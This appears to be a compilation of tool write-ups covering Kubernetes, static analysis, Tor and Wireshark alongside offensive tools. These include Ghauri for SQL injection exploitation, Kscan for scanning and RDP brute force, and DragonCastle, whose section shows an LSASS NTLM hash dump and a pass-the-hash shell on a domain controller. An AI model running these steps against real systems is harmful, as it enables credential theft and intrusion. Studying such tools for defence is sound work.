Popeye is a utility that scans live Kubernetes clusters and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed, not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resource over/under allocations and attempts to warn you should your cluster run out of capacity.

Popeye is a read-only tool; it does not alter any of your Kubernetes resources in any way!


Installation

Popeye is available on Linux, OSX and Windows platforms.

  • Binaries for Linux, Windows and Mac are available as tarballs in the release page.

  • For OSX/Unix using Homebrew/LinuxBrew

    brew install derailed/popeye/popeye
  • Building from source: Popeye was built using Go 1.12+. In order to build Popeye from source you must:

    1. Clone the repo

    2. Add the following command in your go.mod file

      replace (
      github.com/derailed/popeye => MY_POPEYE_CLONED_GIT_REPO
      )
    3. Build and run the executable

      go run main.go

    Quick recipe for the impatient:

    # Clone outside of GOPATH
    git clone https://github.com/derailed/popeye
    cd popeye
    # Build and install
    go install
    # Run
    popeye

PreFlight Checks

  • Popeye uses 256-color terminal mode. On *Nix systems, make sure TERM is set accordingly.

    export TERM=xterm-256color

Sanitizers

Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch in to make Popeye even better.

The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...

Popeye is not another static analysis tool. It runs and inspects Kubernetes resources on live clusters and sanitizes resources as they are in the wild!

Here is a list of some of the available sanitizers:

Resource (aliases) and sanitizers:

Node (alias: no)
  • Conditions, i.e. not ready, out of mem/disk, network, pids, etc.
  • Pod tolerations referencing node taints
  • CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM)

Namespace (alias: ns)
  • Inactive
  • Dead namespaces

Pod (alias: po)
  • Pod status
  • Container statuses
  • ServiceAccount presence
  • CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM)
  • Container image with no tags
  • Container image using latest tag
  • Resources request/limits presence
  • Probes liveness/readiness presence
  • Named ports and their references

Service (alias: svc)
  • Endpoints presence
  • Matching pods labels
  • Named ports and their references

ServiceAccount (alias: sa)
  • Unused, detects potentially unused SAs

Secrets (alias: sec)
  • Unused, detects potentially unused secrets or associated keys

ConfigMap (alias: cm)
  • Unused, detects potentially unused cm or associated keys

Deployment (aliases: dp, deploy)
  • Unused, pod template validation, resource utilization

StatefulSet (alias: sts)
  • Unused, pod template validation, resource utilization

DaemonSet (alias: ds)
  • Unused, pod template validation, resource utilization

PersistentVolume (alias: pv)
  • Unused, check volume bound or volume error

PersistentVolumeClaim (alias: pvc)
  • Unused, check bounded or volume mount error

HorizontalPodAutoscaler (alias: hpa)
  • Unused, utilization, max burst checks

PodDisruptionBudget (alias: pdb)
  • Unused, check minAvailable configuration

ClusterRole (alias: cr)
  • Unused

ClusterRoleBinding (alias: crb)
  • Unused

Role (alias: ro)
  • Unused

RoleBinding (alias: rb)
  • Unused

Ingress (alias: ing)
  • Valid

NetworkPolicy (alias: np)
  • Valid

PodSecurityPolicy (alias: psp)
  • Valid

You can also see the full list of codes

Save the report

To save the Popeye report to a file, pass the --save flag to the command. By default it will create a temp directory and store the report there; the path of the temp directory is printed on STDOUT. If you need to specify the output directory for the report, you can use the environment variable POPEYE_REPORT_DIR. By default, the name of the output file follows the format sanitizer_<cluster-name>_<time-UnixNano>.<output-extension> (e.g. "sanitizer-mycluster-1594019782530851873.html"). If you need to specify the output file name for the report, you can pass the --output-file flag with the desired filename.

Example to save report in working directory:

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save

Example to save report in working directory in HTML format under the name "report.html" :

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html

Save the report to S3

You can also save the generated report to an AWS S3 bucket (or other S3-compatible object storage) by providing the flag --s3-bucket. As a parameter, provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory, provide the bucket parameter as bucket/path/to/report.

Under the hood, the AWS Go library is used, which handles the credential loading. For more information, check out the official documentation.

Example to save report to S3:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json

If AWS S3 is not your bag, you can instead target an S3-compatible storage (OVHcloud Object Storage, Minio, Google Cloud Storage, etc.) using s3-endpoint and s3-region like so:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --s3-region YOUR-REGION --s3-endpoint URL-OF-THE-ENDPOINT

Run public Docker image locally

You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye, so you just need to pass whatever cli args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v :

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
derailed/popeye --context foo -n bar

Running the above docker command with --rm means that the container gets deleted when popeye exits. When you use --save, the report is written to /tmp inside the container, which is then deleted along with the container when popeye exits, so you lose the output. To get around this, map your local /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting the POPEYE_REPORT_DIR env variable.

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
-e POPEYE_REPORT_DIR=/tmp/popeye \
-v /tmp:/tmp \
derailed/popeye --context foo -n bar --save --output-file my_report.txt

# Docker has exited, and the container has been deleted, but the file
# is in your /tmp directory because you mapped it into the container
$ cat /tmp/popeye/my_report.txt
<snip>

The Command Line

You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.

# Dump version info
popeye version
# Popeye a cluster using your current kubeconfig environment.
popeye
# Popeye uses a spinach config file of course! aka spinachyaml!
popeye -f spinach.yml
# Popeye a cluster using a kubeconfig context.
popeye --context olive
# Stuck?
popeye help

Output Formats

Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.

Format | Description | Default | Credits
standard | The full monty output, iconized and colorized | yes |
jurassic | No icons or color, like it's 1979 | |
yaml | As YAML | |
html | As HTML | |
json | As JSON | |
junit | For the Java melancholic | |
prometheus | Dumps the report as Prometheus scrapable metrics | | dardanel
score | Returns a single cluster sanitizer score value (0-100) | | kabute

The SpinachYAML Configuration

A spinach.yml configuration file can be specified via the -f option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.

NOTE: This file will change as Popeye matures!

Under the excludes key you can configure to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBudgets, use the notation policy/v1/poddisruptionbudgets. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (Examples: v1/pods, v1/services, v1/configmaps).

A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name.

For example, the FQN of a pod named fred-1234 in the namespace blee will be blee/fred-1234. This provides for differentiating fred/p1 and blee/p1. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx: prefix.

NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye "configless" to make sure you will recognize any new issues that may have arisen in your clusters…

Here is an example spinach file as it stands in this release. There is a fuller eks and aks based spinach file in this repo under spinach. (BTW: for newcomers to the project, this might be a great way to contribute, by adding cluster-specific spinach file PRs...)

# A Popeye sample configuration file
popeye:
  # Checks resources against reported metrics usage.
  # If over/under these thresholds a sanitization warning will be issued.
  # Your cluster must run a metrics-server for these to take place!
  allocations:
    cpu:
      underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
      overPercUtilization: 50   # Checks if cpu is over allocated by more than 50% at current load.
    memory:
      underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
      overPercUtilization: 50   # Checks if mem is over allocated by more than 50% usage at current load.

  # Excludes excludes certain resources from Popeye scans
  excludes:
    v1/pods:
      # In the monitoring namespace excludes all probes check on pod's containers.
      - name: rx:monitoring
        codes:
          - 102
      # Excludes all istio-proxy container scans for pods in the icx namespace.
      - name: rx:icx/.*
        containers:
          # Excludes istio init/sidecar container from scan!
          - istio-proxy
          - istio-init
    # ConfigMap sanitizer exclusions...
    v1/configmaps:
      # Excludes key must match the singular form of the resource.
      # For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
      - name: rx:fred.+\.v\d+
    # Namespace sanitizer exclusions...
    v1/namespaces:
      # Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
      - name: rx:kube
        codes:
          - 404
      # Exclude all istio* namespaces from being scanned.
      - name: rx:istio
    # Completely exclude horizontal pod autoscalers.
    autoscaling/v1/horizontalpodautoscalers:
      - name: rx:.*

  # Configure node resources.
  node:
    # Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
    limits:
      # CPU checks if current CPU utilization on a node is greater than 90%.
      cpu: 90
      # Memory checks if current Memory utilization on a node is greater than 80%.
      memory: 80

  # Configure pod resources
  pod:
    # Restarts check the restarts count and triggers a lint warning if above threshold.
    restarts: 3
    # Check container resource utilization in percent.
    # Issues a lint warning if above these thresholds.
    limits:
      cpu: 80
      memory: 75

  # Configure a list of allowed registries to pull images from
  registries:
    - quay.io
    - docker.io

Popeye In Your Clusters!

Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.

Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.

kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
---
apiVersion: batch/v1
kind: CronJob
metadata:
  name: popeye
  namespace: popeye
spec:
  schedule: "* */1 * * *" # Fire off Popeye once an hour
  concurrencyPolicy: Forbid
  jobTemplate:
    spec:
      template:
        spec:
          serviceAccountName: popeye
          restartPolicy: Never
          containers:
            - name: popeye
              image: derailed/popeye
              imagePullPolicy: IfNotPresent
              args:
                - -o
                - yaml
                - --force-exit-zero
                - "true"
              resources:
                limits:
                  cpu: 500m
                  memory: 100Mi

The --force-exit-zero should be set to true. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.

Popeye got your RBAC!

In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.

Sample Popeye RBAC Rules (please note that those are subject to change.)

---
# Popeye ServiceAccount.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: popeye
  namespace: popeye

---
# Popeye needs get/list access on the following Kubernetes resources.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: popeye
rules:
  - apiGroups: [""]
    resources:
      - configmaps
      - deployments
      - endpoints
      - horizontalpodautoscalers
      - namespaces
      - nodes
      - persistentvolumes
      - persistentvolumeclaims
      - pods
      - secrets
      - serviceaccounts
      - services
      - statefulsets
    verbs: ["get", "list"]
  - apiGroups: ["rbac.authorization.k8s.io"]
    resources:
      - clusterroles
      - clusterrolebindings
      - roles
      - rolebindings
    verbs: ["get", "list"]
  - apiGroups: ["metrics.k8s.io"]
    resources:
      - pods
      - nodes
    verbs: ["get", "list"]

---
# Binds Popeye to this ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: popeye
subjects:
  - kind: ServiceAccount
    name: popeye
    namespace: popeye
roleRef:
  kind: ClusterRole
  name: popeye
  apiGroup: rbac.authorization.k8s.io

Screenshots

Cluster D Score

Cluster A Score

Report Morphology

The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in terms of sanitizer severity levels:

Level | Icon | Jurassic | Color | Description
Ok | βœ… | OK | Green | Happy!
Info | (info icon) | I | BlueGreen | FYI
Warn | (warning icon) | W | Yellow | Potential Issue
Error | (error icon) | E | Red | Action required

The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.

The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.

Known Issues

This initial drop is brittle. Popeye will most likely blow up when…

  • You're running older versions of Kubernetes. Popeye works best with Kubernetes 1.13+.
  • You don't have enough RBAC oomph to manage your cluster (see RBAC section)

Disclaimer

This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!

ATTA Girls/Boys!

Popeye sits on top of many open source projects and libraries. Our sincere appreciation to all the OSS contributors that work nights and weekends to make this project a reality!

Contact Info

  1. Email: fernand@imhotep.io
  2. Twitter: @kitesurfer


Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


Tai-e

What is Tai-e?

Tai-e (Chinese: ε€ͺ阿; pronunciation: [ˈtaΙͺΙ™:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy-to-learn, easy-to-use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

  • Powerful pointer analysis framework
    • On-the-fly call graph construction
    • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
    • Extensible analysis plugin system (allows you to conveniently develop and add new analyses that interact with pointer analysis)
  • Various fundamental/client/utility analyses
    • Fundamental analyses, e.g., reflection analysis and exception analysis
    • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
    • Clients, e.g., configurable taint analysis (allowing you to configure sources, sinks and taint transfers)
    • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
  • Control/Data-flow analysis framework
    • Control-flow graph construction
    • Classic data-flow analyses, e.g., live variable analysis and constant propagation (see the sketch after this list)
    • Your data-flow analyses
  • SpotBugs-like bug detection system
    • Bug detectors, e.g., null pointer detector, incorrect clone() detector
    • Your bug detectors

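For readers new to data-flow analysis, here is what constant propagation computes on a tiny straight-line program. This is a conceptual Python sketch of the technique only; it has nothing to do with Tai-e's actual API (Tai-e itself is written in Java):

# Each statement assigns an expression to a variable; abstract values are
# either a concrete int (a constant) or "NAC" (Not-A-Constant).
program = [("x", "1"), ("y", "x + 2"), ("z", "y * x"), ("w", "input")]

env = {"input": "NAC"}  # values coming from outside are never constant
for var, expr in program:
    operands = [t for t in expr.split() if t.isidentifier()]
    if any(env.get(v) == "NAC" for v in operands):
        env[var] = "NAC"            # any NAC operand poisons the result
    else:
        env[var] = eval(expr, {}, env)  # all operands constant: fold it

print(env)  # {'input': 'NAC', 'x': 1, 'y': 3, 'z': 3, 'w': 'NAC'}
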
Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


How to Obtain Runnable Jar of Tai-e?

The simplest way is to download it from GitHub Releases.

Alternatively, you can build the latest Tai-e yourself from the source code. This can be done simply via Gradle (be sure that Java 17 or a higher version is available on your system). You just need to run the command gradlew fatJar, and the runnable jar will be generated in tai-e/build/, which includes Tai-e and all its dependencies.

Documentation

We are hosting the documentation of Tai-e on the GitHub wiki, where you can find more information about Tai-e such as Setup in IntelliJ IDEA, Command-Line Options, and Development of New Analysis.

Tai-e Assignments

In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



TOR Virtual Network Tunneling Tool 0.4.7.13

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.

Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd to the ghauri directory.
  • install the requirements: python3 -m pip install --upgrade -r requirements.txt
  • run: python3 setup.py install or python3 -m pip install -e .
  • you will then be able to run ghauri with a simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports the following types of injection payloads:
    • Boolean based
    • Error based
    • Time based
    • Stacked queries
  • Supports SQL injection for the following DBMS:
    • MySQL
    • Microsoft SQL Server
    • PostgreSQL
    • Oracle
  • Supports the following injection types:
    • GET/POST based injections
    • Headers based injections
    • Cookies based injections
    • Multipart form data injections
    • JSON based injections
  • Supports the proxy option --proxy.
  • Supports parsing a request from a txt file: use the -r file.txt switch (see the example after this list).
  • Supports limiting data extraction for dbs/tables/columns/dump: switches --start 1 --stop 2.
  • Added support for resuming of all phases.
  • Added support for the skip urlencoding switch: --skip-urlencode.
  • Added support to verify extracted characters in case of boolean/time based injections.
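
For the -r switch, the file is expected to contain a raw HTTP request, along these lines (an illustrative request, not taken from the project docs):

POST /vuln.php HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

id=1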

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1').
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value
-H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrieve entries from offset for dbs/tables/columns/dump
--stop Retrieve entries till offset for dbs/tables/columns/dump

Example:
ghauri -u http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union-based queries.


Wireshark Analyzer 4.0.3

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process


A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables the Remote Registry service to modify the AutodialDLL entry and start/restart the BITS service. Svchost loads our DLL, which sets AutodialDLL back to its default value and performs an RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it searches inside the process memory to extract NTLM hashes and the key/IV.

DllMain always returns FALSE so the processes don't keep the DLL loaded.
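
For context, the registry side of the technique revolves around a single value. The sketch below shows the equivalent local operation with Python's winreg module (DragonCastle performs it remotely over the Remote Registry service); the planted DLL path is a placeholder, and the default value shown is the usual one but may vary per system.

import winreg  # Windows only; run as administrator

KEY_PATH = r"SYSTEM\CurrentControlSet\Services\WinSock2\Parameters"
DEFAULT_DLL = r"C:\Windows\System32\rasadhlp.dll"  # usual default (assumption)

def set_autodial_dll(dll_path: str) -> None:
    # Point the Winsock autodial helper at an arbitrary DLL.
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH, 0,
                        winreg.KEY_SET_VALUE) as key:
        winreg.SetValueEx(key, "AutodialDLL", 0, winreg.REG_SZ, dll_path)

def get_autodial_dll() -> str:
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH) as key:
        value, _ = winreg.QueryValueEx(key, "AutodialDLL")
        return value

set_autodial_dll(r"c:\dump.dll")   # placeholder path, as in the example below
print(get_autodial_dll())
# The planted DLL is expected to restore DEFAULT_DLL once it has been loaded.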


Caveats

It only works when RunAsPPL is not enabled. Also, I only added support to decrypt 3DES because I am lazy, but it should be easy to add code for AES. For the same reason, I only implemented support for the following Windows versions:

Build                            Support
Windows 10 version 21H2
Windows 10 version 21H1          Implemented
Windows 10 version 20H2          Implemented
Windows 10 version 20H1 (2004)   Implemented
Windows 10 version 1909          Implemented
Windows 10 version 1903          Implemented
Windows 10 version 1809          Implemented
Windows 10 version 1803          Implemented
Windows 10 version 1709          Implemented
Windows 10 version 1703          Implemented
Windows 10 version 1607          Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid domain name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|β‡’  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel FernΓ‘ndez (@TheXC3LL)

References



Kscan - Simple Asset Mapping Tool


0 Disclaimer (The author did not participate in the XX action; do not trace it)

  • This tool is only for legally authorized enterprise security construction behaviors and personal learning behaviors. If you need to test the usability of this tool, please build a target drone environment by yourself.

  • When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not scan unauthorized targets.

We reserve the right to hold you legally responsible if any of the prohibited behavior described above is discovered.

If you engage in any illegal behavior while using this tool, you will bear the corresponding consequences yourself, and we will not bear any legal or joint liability.

Before installing and using this tool, please be sure to carefully read and fully understand the terms and conditions.

Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use of this tool, or your acceptance of this Agreement in any other express or implied manner, shall be deemed to mean that you have read and agreed to be bound by this Agreement.

1 Introduction

 _   __
|#| /#/ Lightweight Asset Mapping Tool by: kv2
|#|/#/ _____ _____ * _ _
|#.#/ /Edge/ /Forum| /#\ |#\ |#|
|##| |#|___ |#| /###\ |##\|#|
|#.#\ \#####\|#| /#/_\#\ |#.#.#|
|#|\#\ /\___|#||#|____/#/###\#\|#|\##|
|#| \#\\#####/ \#####/#/ \#\#| \#|

Kscan is an asset mapping tool that can perform port scanning, TCP fingerprinting and banner capture for specified assets, obtaining as much port information as possible without sending additional packets. It can automatically brute-force its scan results, and it is the first open-source RDP brute-force tool on the Go platform.

2 Foreword

At present there are many tools for asset scanning, fingerprint identification, and vulnerability detection, and many of them are great, but Kscan takes a number of different approaches.

  • Kscan aims to accept a variety of input formats, so there is no need to classify scan targets (IP, URL address, etc.) before use, which would be unnecessary work for the user; all entries are recognized and handled automatically. If an entry is a URL address, the path is preserved for detection; if it is only IP:PORT, protocol identification is prioritized for that port. Kscan currently supports three input methods (-t/--target, -f/--fofa, --spy).

  • Kscan does not chase efficiency by mapping port numbers to common protocols to infer a port's protocol, nor does it detect WEB assets only. Kscan puts more emphasis on accuracy and comprehensiveness: only high-accuracy protocol identification can provide good conditions for subsequent application-layer identification (a toy illustration follows this list).

  • Kscan does not take a modular approach of pure function stacking, where one module obtains the title, another obtains SMB information, and each runs and outputs independently. Instead, it outputs asset information in units of ports: if a port's protocol is HTTP, fingerprinting and title acquisition follow automatically; if the port's protocol is RPC, it tries to obtain the host name, and so on.
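
As a toy illustration of the port-first protocol identification idea described above (not Kscan's actual probe engine), the sketch below connects to a port, waits for a banner from protocols that speak first, and falls back to an HTTP probe for silent services.

import socket

def identify(host: str, port: int, timeout: float = 3.0) -> str:
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            banner = s.recv(1024)          # FTP/SSH/SMTP-style services speak first
        except socket.timeout:
            banner = b""
        if banner.startswith(b"SSH-"):
            return "ssh"
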